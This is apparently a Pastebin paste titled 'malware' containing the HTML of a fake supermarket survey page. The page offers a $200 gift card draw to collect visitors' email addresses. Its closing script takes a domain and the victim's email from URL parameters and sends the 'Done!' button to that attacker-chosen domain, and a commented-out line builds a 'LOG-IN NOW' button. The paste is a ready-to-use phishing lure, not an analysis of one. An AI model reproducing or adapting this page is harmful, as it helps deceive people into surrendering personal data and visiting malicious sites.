Advertisement
Guest User

malware

a guest
Feb 19th, 2020
174
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.31 KB | None | 0 0
  1. <!doctype html>
  2. <html lang="en">
  3. <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  4. <!-- Required meta tags -->
  5.  
  6. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  7.  
  8. <!-- Bootstrap CSS -->
  9. <link rel="stylesheet" type="text/css" href="css/bootstrap/bootstrap.min.css">
  10. <link rel="stylesheet" type="text/css" href="css/style.css">
  11. <link rel="stylesheet" type="text/css" href="css/animate.css">
  12. <link rel="stylesheet" type="text/css" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
  13.  
  14.  
  15. </head>
  16. <body>
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25. <!--======================================== Page 1 html start=======================================-->
  26. <section id="page-1">
  27.  
  28. <div class="row ">
  29.  
  30. <div class="col-lg-4 col-md-3 col-sm-4 col-12 "></div>
  31. <div class="col-lg-4 col-md-6 col-sm-4 col-12 ">
  32.  
  33. <div class="pag-1-content content-style">
  34. <h4 class="super-text">Supermarket Survey</h4>
  35. <p class="mb-0 numbertop">Would you recommend X to others?</p>
  36. <ul class="list-inline number-list">
  37. <li class="number-list-item a">1</li>
  38. <li class="number-list-item b">2</li>
  39. <li class="number-list-item c">3</li>
  40. <li class="number-list-item d">4</li>
  41. <li class="number-list-item e">5</li>
  42. <li class="number-list-item f">6</li>
  43. <li class="number-list-item g">7</li>
  44. <li class="number-list-item h">8</li>
  45. <li class="number-list-item i">9</li>
  46. <li class="number-list-item j">10</li>
  47.  
  48. </ul>
  49. <p class="number-text"><span class="number-text-l">To a very low extent</span> <span class="number-text-r">To a high extent</span></p>
  50. <p class="checkbox-tag">Choose 3 things you think is important when you go shopping in a supermarket</p>
  51. <div class="row-one mb-3">
  52. <div class="form-check form-check-inline">
  53. <input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio1" value="option1">
  54. <label class="form-check-label" for="inlineRadio1">Selection</label>
  55. </div>
  56. <div class="form-check form-check-inline">
  57. <input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio2" value="option2">
  58. <label class="form-check-label" for="inlineRadio2">Openings hours</label>
  59. </div>
  60. <div class="form-check form-check-inline">
  61. <input class="form-check-input" type="radio" name="inlineRadioOptions" id="inlineRadio3" value="option3" >
  62. <label class="form-check-label" for="inlineRadio3">Staff</label>
  63. </div>
  64. </div>
  65.  
  66. <div class="row-two mb-3">
  67. <div class="form-check-2 form-check-inline">
  68. <input class="form-check-input" type="radio" name="inlineRadioOptions2" id="inlineRadio4" value="option4">
  69. <label class="form-check-label" for="inlineRadio4">Interior design</label>
  70. </div>
  71. <div class="form-check-2 form-check-inline">
  72. <input class="form-check-input" type="radio" name="inlineRadioOptions2" id="inlineRadio5" value="option5">
  73. <label class="form-check-label" for="inlineRadio5">Price</label>
  74. </div>
  75. <div class="form-check-2 form-check-inline">
  76. <input class="form-check-input" type="radio" name="inlineRadioOptions2" id="inlineRadio6" value="option6" >
  77. <label class="form-check-label" for="inlineRadio6">Location</label>
  78. </div>
  79. </div>
  80.  
  81. <div class="row-three">
  82. <div class="form-check-3 form-check-inline">
  83. <input class="form-check-input" type="radio" name="inlineRadioOptions3" id="inlineRadio7" value="option7">
  84. <label class="form-check-label" for="inlineRadio7">Customer service</label>
  85. </div>
  86. <div class="form-check-3 form-check-inline">
  87. <input class="form-check-input" type="radio" name="inlineRadioOptions3" id="inlineRadio8" value="option8">
  88. <label class="form-check-label" for="inlineRadio8">Customer benefits</label>
  89. </div>
  90. <div class="form-check-3 form-check-inline">
  91. <input class="form-check-input" type="radio" name="inlineRadioOptions3" id="inlineRadio9" value="option9" >
  92. <label class="form-check-label" for="inlineRadio9">area</label>
  93. </div>
  94. </div>
  95.  
  96. <p class="checkbox-tag">How would you rate your experience of your local supermarket so far?</p>
  97.  
  98. <ul class="list-inline emoji-list">
  99. <li class="emoji-list-item az"><img class="ax" src="img/Vector.png"></li>
  100. <li class="emoji-list-item bz"><img class="bx" src="img/Vector2.png"></li>
  101. <li class="emoji-list-item cz"><img class="cx" src="img/Vector3.png"></li>
  102. <li class="emoji-list-item dz"><img class="dx" src="img/Vector4.png"></li>
  103. <li class="emoji-list-item ez"><img class="ex" src="img/Vector5.png"></li>
  104.  
  105. </ul>
  106. <h5 class="text-center tak-for">Thank you for your answers!</h5>
  107. <div class="text-center">
  108. <button class="btn btn-lg next-button">Next</button>
  109. </div>
  110. </div>
  111. <!-- page-2 content -->
  112. <div class="page-2-content content-style">
  113.  
  114. <h4 class="nd-super-text text-center">Supermarket survey</h4>
  115. <p>Thank you for your answers!</p>
  116. <p>Do you want to participate in the draw</p>
  117. <p>for a gift card of $200 ?</p>
  118. <p>If so, simply enter your email below</p>
  119. <input type="email" class="form-control" id="inputEmail4" placeholder="Email">
  120. <div class="form-group">
  121. <div class="form-check email-checkout">
  122. <input class="form-check-input" type="checkbox" id="gridCheck">
  123. <label class="form-check-label" for="gridCheck">
  124. I consent to the storage of personal data
  125. in this case my email address.
  126. </label>
  127. </div>
  128. </div>
  129. <div class="text-center">
  130.  
  131. <a href="#" class="go-final"><button class="btn btn-lg next-button">Done!</button></a>
  132. </div>
  133. </div>
  134. </div>
  135. <div class="col-lg-4 col-md-3 col-sm-4 col-12 "></div>
  136.  
  137. </div>
  138.  
  139.  
  140.  
  141. </section>
  142.  
  143. <!--======================================== page 1 html end=======================================-->
  144.  
  145.  
  146.  
  147. <!-- Optional JavaScript -->
  148. <!-- jQuery first, then Popper.js, then Bootstrap JS -->
  149. <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
  150. <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  151. <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js" integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1" crossorigin="anonymous"></script>
  152. <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js" integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM" crossorigin="anonymous"></script>
  153. <script type="text/javascript" src="js/custom.js"></script>
  154.  
  155.  
  156.  
  157.  
  158. <script>
  159. function getURLParameter(name) {
  160. return decodeURI(
  161. (RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || '');
  162. }
  163.  
  164. // Grab dom URL variable
  165. var dom = getURLParameter('dom');
  166. var email = getURLParameter('email');
  167. var emaildec = decodeURI(email);
  168. var realemail = email.replace("%40", "@");
  169.  
  170. //build link - insert into HTML
  171. // document.write('<a href="'+ link + '" class="**button classes here**" style="display: inline-block;">LOG-IN NOW</a>');
  172. var link = "http://" + dom + "/click/1";
  173.  
  174. jQuery(document).ready(function (e) {
  175. $('.go-final').attr('href', link);
  176. });
  177. </script>
  178.  
  179. </body>
  180. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement